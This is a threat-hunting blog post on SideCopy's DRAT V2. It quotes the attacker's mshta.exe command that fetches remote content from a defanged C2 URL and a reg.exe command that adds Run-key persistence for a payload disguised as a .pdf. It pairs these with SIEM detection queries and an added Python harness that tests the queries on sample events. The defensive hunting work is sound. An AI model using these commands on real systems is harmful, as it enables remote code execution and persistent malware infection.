177. Hunting for SideCopy's DRAT V2

Hello everyone!

Let's look at another example of the ClickFix technique being leveraged. This time it's SideCopy, a sub-cluster of Transparent Tribe. Recorded Future recently reported on a new version of DRAT, so let's look at some detection and hunting opportunities.

First of all, the adversary abuses mshta.exe:

C:\Windows\System32\mshta.exe hxxps://trade4wealth[.]in/admin/assets/css/default/index.php

It's a great candidate for hunting! For example, we can search for mshta.exe executing files from remote servers:

event_type: "processcreatewin"
AND proc_file_name: "mshta.exe"
AND cmdline: ("http" OR "https")

Next, it abuses reg.exe to establish persistence for DRAT:

REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Edgre" /t REG_SZ /F /D "cmd /C start C:\Users\Public\USOShared-1de48789-1285\zuidrt.pdf"

Here we can hunt for files located under %PUBLIC% being added to the Run key, for example:

event_type: "processcreatewin"
AND proc_file_name: "reg.exe"
AND cmdline: ("add" AND "run" AND "public")

Finally, the adversary executes cmd.exe to run a masqueraded malicious file (a payload with a .pdf extension) from %PUBLIC%, and this is another hunting opportunity:

event_type: "processcreatewin"
AND proc_file_name: "cmd.exe"
AND cmdline: ("start" AND "public")
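To see how the three hunts above behave against real-looking telemetry, here is an added example (not part of the original post) that expresses each query as a Python predicate and runs them over a small, constructed set of process-creation events. The field names (event_type, proc_file_name, cmdline) are taken from the queries; the events are constructed for illustration, with the real C2 domain replaced by a placeholder, and the benign look-alikes show what the queries deliberately do not match.

```python
"""Added example: the post's three hunting queries as Python predicates,
run over constructed sample events (not real telemetry)."""

from typing import Callable, Dict, List

Event = Dict[str, str]
Rule = Callable[[Event], bool]

# Constructed sample events. Events 0-2 mirror the command lines quoted in
# the post (domain replaced by a placeholder); events 3-6 are benign
# look-alikes that a hunt should NOT flag.
SAMPLE_EVENTS: List[Event] = [
    {"event_type": "processcreatewin", "proc_file_name": "mshta.exe",
     "cmdline": r"C:\Windows\System32\mshta.exe https://example.invalid/admin/assets/css/default/index.php"},
    {"event_type": "processcreatewin", "proc_file_name": "reg.exe",
     "cmdline": r'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Edgre" /t REG_SZ /F /D "cmd /C start C:\Users\Public\USOShared-1de48789-1285\zuidrt.pdf"'},
    {"event_type": "processcreatewin", "proc_file_name": "cmd.exe",
     "cmdline": r"cmd /C start C:\Users\Public\USOShared-1de48789-1285\zuidrt.pdf"},
    # mshta running a local .hta: no URL on the command line
    {"event_type": "processcreatewin", "proc_file_name": "mshta.exe",
     "cmdline": r"C:\Windows\System32\mshta.exe C:\ProgramData\Vendor\setup.hta"},
    # Run-key persistence for a vendor updater outside %PUBLIC%
    {"event_type": "processcreatewin", "proc_file_name": "reg.exe",
     "cmdline": r'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Updater" /t REG_SZ /D "C:\Program Files\Vendor\updater.exe"'},
    # cmd touching %PUBLIC% without "start"
    {"event_type": "processcreatewin", "proc_file_name": "cmd.exe",
     "cmdline": r"cmd.exe /c dir C:\Users\Public\Documents"},
    # same mshta command line, but a network event, not a process creation
    {"event_type": "networkconnectwin", "proc_file_name": "mshta.exe",
     "cmdline": r"C:\Windows\System32\mshta.exe https://example.invalid/admin/assets/css/default/index.php"},
]


def _terms_present(cmdline: str, *terms: str, require_all: bool = True) -> bool:
    """Case-insensitive substring test, mirroring how the post's
    cmdline: (...) clauses behave in a typical SIEM."""
    text = cmdline.lower()
    hits = [t.lower() in text for t in terms]
    return all(hits) if require_all else any(hits)


def _is_process_create(event: Event, image: str) -> bool:
    return (event.get("event_type") == "processcreatewin"
            and event.get("proc_file_name", "").lower() == image)


def mshta_remote_content(event: Event) -> bool:
    """Query 1: mshta.exe launched with a URL on its command line.
    Note that defanged IoCs ("hxxps") would not match; telemetry
    carries the real scheme."""
    return (_is_process_create(event, "mshta.exe")
            and _terms_present(event.get("cmdline", ""), "http", "https", require_all=False))


def reg_run_key_public(event: Event) -> bool:
    """Query 2: reg.exe adding a %PUBLIC% path to a Run key."""
    return (_is_process_create(event, "reg.exe")
            and _terms_present(event.get("cmdline", ""), "add", "run", "public"))


def cmd_start_public(event: Event) -> bool:
    """Query 3: cmd.exe using 'start' on something under %PUBLIC%."""
    return (_is_process_create(event, "cmd.exe")
            and _terms_present(event.get("cmdline", ""), "start", "public"))


RULES: Dict[str, Rule] = {
    "mshta_remote_content": mshta_remote_content,
    "reg_run_key_public": reg_run_key_public,
    "cmd_start_public": cmd_start_public,
}


def hunt(events: List[Event]) -> Dict[str, List[int]]:
    """Return, per rule, the indices of the events it flags."""
    hits: Dict[str, List[int]] = {name: [] for name in RULES}
    for idx, event in enumerate(events):
        for name, rule in RULES.items():
            if rule(event):
                hits[name].append(idx)
    return hits


if __name__ == "__main__":
    for name, idxs in hunt(SAMPLE_EVENTS).items():
        print(f"{name}: {idxs}")
        for i in idxs:
            print("    ", SAMPLE_EVENTS[i]["cmdline"])
```

Run as a script, it lists each rule with the command lines it flagged; only events 0, 1 and 2 match, one per rule. Two things worth keeping in mind when porting this to a real SIEM: the "http" term already covers "https", so the OR in the first query is harmless but redundant, and the reg.exe and cmd.exe hunts are keyword-based, so legitimate admin scripts that reference %PUBLIC% will surface and need to be tuned out by parent process or signer rather than by dropping the rule.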

See you tomorrow!
